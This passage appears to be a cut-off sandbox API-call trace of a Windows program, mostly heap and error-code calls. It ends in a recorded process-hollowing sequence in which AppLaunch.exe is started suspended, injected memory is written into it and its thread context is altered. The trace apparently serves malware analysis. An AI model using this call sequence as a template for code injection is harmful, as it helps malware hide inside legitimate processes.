returned 0x57 [0245.697] SetLastError (dwErrCode=0x57) [0245.697] GetLastError () returned 0x57 [0245.697] SetLastError (dwErrCode=0x57) [0245.697] GetLastError () returned 0x57 [0245.698] SetLastError (dwErrCode=0x57) [0245.698] GetLastError () returned 0x57 [0245.698] SetLastError (dwErrCode=0x57) [0245.698] GetLastError () returned 0x57 [0245.698] SetLastError (dwErrCode=0x57) [0245.698] GetLastError () returned 0x57 [0245.698] SetLastError (dwErrCode=0x57) [0245.698] GetLastError () returned 0x57 [0245.698] SetLastError (dwErrCode=0x57) [0245.698] GetLastError () returned 0x57 [0245.698] SetLastError (dwErrCode=0x57) [0245.698] GetLastError () returned 0x57 [0245.698] SetLastError (dwErrCode=0x57) [0245.698] GetLastError () returned 0x57 [0245.698] SetLastError (dwErrCode=0x57) [0245.698] GetLastError () returned 0x57 [0245.698] SetLastError (dwErrCode=0x57) [0245.698] GetLastError () returned 0x57 [0245.698] SetLastError (dwErrCode=0x57) [0245.699] GetLastError () returned 0x57 [0245.699] SetLastError (dwErrCode=0x57) [0245.699] GetLastError () returned 0x57 [0245.699] SetLastError (dwErrCode=0x57) [0245.699] GetLastError () returned 0x57 [0245.699] SetLastError (dwErrCode=0x57) [0245.699] GetLastError () returned 0x57 [0245.699] SetLastError (dwErrCode=0x57) [0245.699] GetLastError () returned 0x57 [0245.699] SetLastError (dwErrCode=0x57) [0245.699] GetLastError () returned 0x57 [0245.699] SetLastError (dwErrCode=0x57) [0245.699] GetLastError () returned 0x57 [0245.699] SetLastError (dwErrCode=0x57) [0245.699] GetLastError () returned 0x57 [0245.699] SetLastError (dwErrCode=0x57) [0245.699] GetLastError () returned 0x57 [0245.699] SetLastError (dwErrCode=0x57) [0245.699] GetLastError () returned 0x57 [0245.700] SetLastError (dwErrCode=0x57) [0245.700] GetLastError () returned 0x57 [0245.700] SetLastError (dwErrCode=0x57) [0245.700] GetLastError () returned 0x57 [0245.700] SetLastError (dwErrCode=0x57) [0245.700] GetLastError () returned 0x57 [0245.700] SetLastError (dwErrCode=0x57) [0245.700] GetLastError () returned 0x57 [0245.700] SetLastError (dwErrCode=0x57) [0245.700] GetLastError () returned 0x57 [0245.700] SetLastError (dwErrCode=0x57) [0245.700] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x8) returned 0xa8abf8 [0245.700] GetLastError () returned 0x57 [0245.700] SetLastError (dwErrCode=0x57) [0245.700] GetLastError () returned 0x57 [0245.700] SetLastError (dwErrCode=0x57) [0245.700] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0xb8) returned 0xa8cd10 [0245.701] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x6a6) returned 0xa8dfe8 [0245.702] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8dfe8 | out: hHeap=0xa70000) returned 1 [0245.702] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8abd8 | out: hHeap=0xa70000) returned 1 [0245.703] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8cc50 | out: hHeap=0xa70000) returned 1 [0245.703] GetLastError () returned 0x57 [0245.703] SetLastError (dwErrCode=0x57) [0245.703] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x6) returned 0xa8abd8 [0245.703] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x2) returned 0xa8ac08 [0245.703] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x4) returned 0xa8ac18 [0245.703] GetLastError () returned 0x57 [0245.703] SetLastError (dwErrCode=0x57) [0245.703] GetLastError () returned 0x57 [0245.703] SetLastError (dwErrCode=0x57) [0245.703] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0xb8) returned 0xa8cc50 [0245.703] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x6a6) returned 0xa8dfe8 [0245.704] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8dfe8 | out: hHeap=0xa70000) returned 1 [0245.704] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8abd8 | out: hHeap=0xa70000) returned 1 [0245.704] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8cd10 | out: hHeap=0xa70000) returned 1 [0245.704] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8ac18 | out: hHeap=0xa70000) returned 1 [0245.704] GetLastError () returned 0x57 [0245.704] SetLastError (dwErrCode=0x57) [0245.704] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x6) returned 0xa8abd8 [0245.704] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x2) returned 0xa8ac18 [0245.704] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x4) returned 0xa8ac28 [0245.704] GetLastError () returned 0x57 [0245.704] SetLastError (dwErrCode=0x57) [0245.704] GetLastError () returned 0x57 [0245.704] SetLastError (dwErrCode=0x57) [0245.704] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0xb8) returned 0xa8cd10 [0245.705] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x6a6) returned 0xa8dfe8 [0245.705] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8dfe8 | out: hHeap=0xa70000) returned 1 [0245.705] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8abd8 | out: hHeap=0xa70000) returned 1 [0245.705] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8cc50 | out: hHeap=0xa70000) returned 1 [0245.705] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8ac28 | out: hHeap=0xa70000) returned 1 [0245.705] GetLastError () returned 0x57 [0245.705] SetLastError (dwErrCode=0x57) [0245.705] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x6) returned 0xa8abd8 [0245.705] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8ac18 | out: hHeap=0xa70000) returned 1 [0245.705] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8ac08 | out: hHeap=0xa70000) returned 1 [0245.705] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x8) returned 0xa8ac08 [0245.755] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x18) returned 0xa8bca0 [0245.755] GetLastError () returned 0x57 [0245.756] SetLastError (dwErrCode=0x57) [0245.756] GetLastError () returned 0x57 [0245.756] SetLastError (dwErrCode=0x57) [0245.756] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0xb8) returned 0xa8cc50 [0245.756] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x6a6) returned 0xa8dfe8 [0245.756] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8dfe8 | out: hHeap=0xa70000) returned 1 [0245.756] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8abd8 | out: hHeap=0xa70000) returned 1 [0245.757] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8cd10 | out: hHeap=0xa70000) returned 1 [0245.757] GetLastError () returned 0x57 [0245.757] SetLastError (dwErrCode=0x57) [0245.757] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x6) returned 0xa8abd8 [0245.757] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x2) returned 0xa8ac18 [0245.757] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x4) returned 0xa8ac28 [0245.757] GetLastError () returned 0x57 [0245.757] SetLastError (dwErrCode=0x57) [0245.757] GetLastError () returned 0x57 [0245.757] SetLastError (dwErrCode=0x57) [0245.757] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0xb8) returned 0xa8cd10 [0245.757] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x6a6) returned 0xa8dfe8 [0245.757] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8dfe8 | out: hHeap=0xa70000) returned 1 [0245.757] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8abd8 | out: hHeap=0xa70000) returned 1 [0245.758] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8cc50 | out: hHeap=0xa70000) returned 1 [0245.758] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8ac28 | out: hHeap=0xa70000) returned 1 [0245.758] GetLastError () returned 0x57 [0245.758] SetLastError (dwErrCode=0x57) [0245.758] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x6) returned 0xa8abd8 [0245.758] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x2) returned 0xa8ac28 [0245.758] GetLastError () returned 0x57 [0245.758] SetLastError (dwErrCode=0x57) [0245.758] GetLastError () returned 0x57 [0245.758] SetLastError (dwErrCode=0x57) [0245.758] GetLastError () returned 0x57 [0245.758] SetLastError (dwErrCode=0x57) [0245.758] GetLastError () returned 0x57 [0245.759] SetLastError (dwErrCode=0x57) [0245.759] GetLastError () returned 0x57 [0245.759] SetLastError (dwErrCode=0x57) [0245.759] GetLastError () returned 0x57 [0245.759] SetLastError (dwErrCode=0x57) [0245.759] GetLastError () returned 0x57 [0245.759] SetLastError (dwErrCode=0x57) [0245.759] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x1) returned 0xa8ac38 [0245.759] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x6) returned 0xa8cc50 [0245.759] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x5) returned 0xa8cc60 [0245.759] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0x4) returned 0xa8e000 [0245.759] GetLastError () returned 0x57 [0245.759] SetLastError (dwErrCode=0x57) [0245.759] GetLastError () returned 0x57 [0245.759] SetLastError (dwErrCode=0x57) [0245.759] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x8, Size=0xb8) returned 0xa8e3e8 [0245.759] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x6a6) returned 0xa8e4a8 [0245.760] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8e4a8 | out: hHeap=0xa70000) returned 1 [0245.760] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8abd8 | out: hHeap=0xa70000) returned 1 [0245.760] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8cd10 | out: hHeap=0xa70000) returned 1 [0245.760] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8e000 | out: hHeap=0xa70000) returned 1 [0245.760] GetLastError () returned 0x57 [0245.760] SetLastError (dwErrCode=0x57) [0245.760] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x6) returned 0xa8e000 [0245.760] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8ac28 | out: hHeap=0xa70000) returned 1 [0245.760] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8ac18 | out: hHeap=0xa70000) returned 1 [0245.760] RtlAllocateHeap (HeapHandle=0xa70000, Flags=0x0, Size=0x8) returned 0xa8e010 [0245.760] GetLastError () returned 0x57 [0245.761] GetProcAddress (hModule=0x769b0000, lpProcName="FlsGetValue") returned 0x769c1252 [0245.761] SetLastError (dwErrCode=0x57) [0245.762] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0245.763] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualProtect") returned 0x769c4317 [0245.763] VirtualProtect (in: lpAddress=0x18f744, dwSize=0x77e, flNewProtect=0x40, lpflOldProtect=0xa9c74 | out: lpflOldProtect=0xa9c74*=0x4) returned 1 [0245.764] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0245.764] FindResourceW (hModule=0x400000, lpName=0x65, lpType=0xa) returned 0x92d080 [0245.768] LoadResource (hModule=0x400000, hResInfo=0x92d080) returned 0x92d0a0 [0245.786] LockResource (hResData=0x92d0a0) returned 0x92d0a0 [0245.786] SizeofResource (hModule=0x400000, hResInfo=0x92d080) returned 0x1a000 [0245.789] CreateProcessW (in: lpApplicationName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0xa9b20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa9c5c | out: lpCommandLine=0x0, lpProcessInformation=0xa9c5c*(hProcess=0xac, hThread=0xa8, dwProcessId=0xfc8, dwThreadId=0xfcc)) returned 1 [0245.824] GetThreadContext (in: hThread=0xa8, lpContext=0xa9854 | out: lpContext=0xa9854*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0xfffde000, Edx=0x0, Ecx=0x0, Eax=0x116fb00, Ebp=0x0, Eip=0x779f01c4, SegCs=0x23, EFlags=0x202, Esp=0x43f860, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0245.833] ReadProcessMemory (in: hProcess=0xac, lpBaseAddress=0xfffde008, lpBuffer=0xa9c44, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xa9c44*, lpNumberOfBytesRead=0x0) returned 1 [0245.833] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x3000, flProtect=0x40) returned 0x3600000 [0245.835] VirtualAllocEx (hProcess=0xac, lpAddress=0x400000, dwSize=0x20000, flAllocationType=0x3000, flProtect=0x40) returned 0x0 [0245.835] VirtualAllocEx (hProcess=0xac, lpAddress=0x0, dwSize=0x20000, flAllocationType=0x3000, flProtect=0x40) returned 0x70000 [0245.838] WriteProcessMemory (in: hProcess=0xac, lpBaseAddress=0x70000, lpBuffer=0x3600000*, nSize=0x20000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x3600000*, lpNumberOfBytesWritten=0x0) returned 1 [0245.844] VirtualProtectEx (in: hProcess=0xac, lpAddress=0x70000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0xa9be0 | out: lpflOldProtect=0xa9be0*=0x40) returned 1 [0245.844] VirtualProtectEx (in: hProcess=0xac, lpAddress=0x72000, dwSize=0x18d7c, flNewProtect=0x20, lpflOldProtect=0xa9be0 | out: lpflOldProtect=0xa9be0*=0x40) returned 1 [0245.846] VirtualProtectEx (in: hProcess=0xac, lpAddress=0x8c000, dwSize=0x4d4, flNewProtect=0x2, lpflOldProtect=0xa9be0 | out: lpflOldProtect=0xa9be0*=0x40) returned 1 [0245.846] VirtualProtectEx (in: hProcess=0xac, lpAddress=0x8e000, dwSize=0xc, flNewProtect=0x2, lpflOldProtect=0xa9be0 | out: lpflOldProtect=0xa9be0*=0x40) returned 1 [0245.846] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0245.850] WriteProcessMemory (in: hProcess=0xac, lpBaseAddress=0xfffde008, lpBuffer=0xa9c74*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0xa9c74*, lpNumberOfBytesWritten=0x0) returned 1 [0245.851] SetThreadContext (hThread=0xa8, lpContext=0xa9854*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0xfffde000, Edx=0x0, Ecx=0x0, Eax=0x891a6, Ebp=0x0, Eip=0x779f01c4, SegCs=0x23, EFlags=0x202, Esp=0x43f860, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, 